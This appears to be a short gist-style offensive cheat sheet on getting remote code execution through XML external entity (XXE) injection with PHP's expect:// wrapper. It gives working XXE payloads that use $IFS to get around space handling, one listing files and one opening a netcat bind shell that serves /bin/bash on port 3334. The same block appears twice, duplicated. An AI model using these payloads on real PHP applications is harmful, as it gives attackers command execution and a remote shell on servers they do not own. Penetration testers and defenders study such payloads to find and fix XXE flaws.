mosesrenegade/XXE RCE Expect PHP

## XXE RCE Expect PHP
What follows below is how to trigger an RCE with PHP using the Expect Wrapper. The problem is that spaces are not interpreted correctly. Here is a great tip: Use the $IFS (Internal Field Seperator in Bash). Another pro tip: Don't allow for XXE.

https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7

```
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>
<entry>
  <subject>&xxe;</subject>
  <category>Test</category>
  <text>Test</text>
</entry>
```
You need to also wrap any arguments that are numbers or potentially specifically special characters in string quotes.
```
<!ENTITY xxe SYSTEM "expect://nc$IFS-nvlp$IFS'3334'$IFS-e$IFS'/bin/bash'">]>
```
	What follows below is how to trigger an RCE with PHP using the Expect Wrapper. The problem is that spaces are not interpreted correctly. Here is a great tip: Use the $IFS (Internal Field Seperator in Bash). Another pro tip: Don't allow for XXE.

	https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7

	```
	<?xml version="1.0"?>
	<!DOCTYPE foo [
	<!ELEMENT foo ANY >
	<!ENTITY xxe SYSTEM "expect://ls$IFS-lahrt">]>
	<entry>
	<subject>&xxe;</subject>
	<category>Test</category>
	<text>Test</text>
	</entry>
	```
	You need to also wrap any arguments that are numbers or potentially specifically special characters in string quotes.
	```
	<!ENTITY xxe SYSTEM "expect://nc$IFS-nvlp$IFS'3334'$IFS-e$IFS'/bin/bash'">]>
	```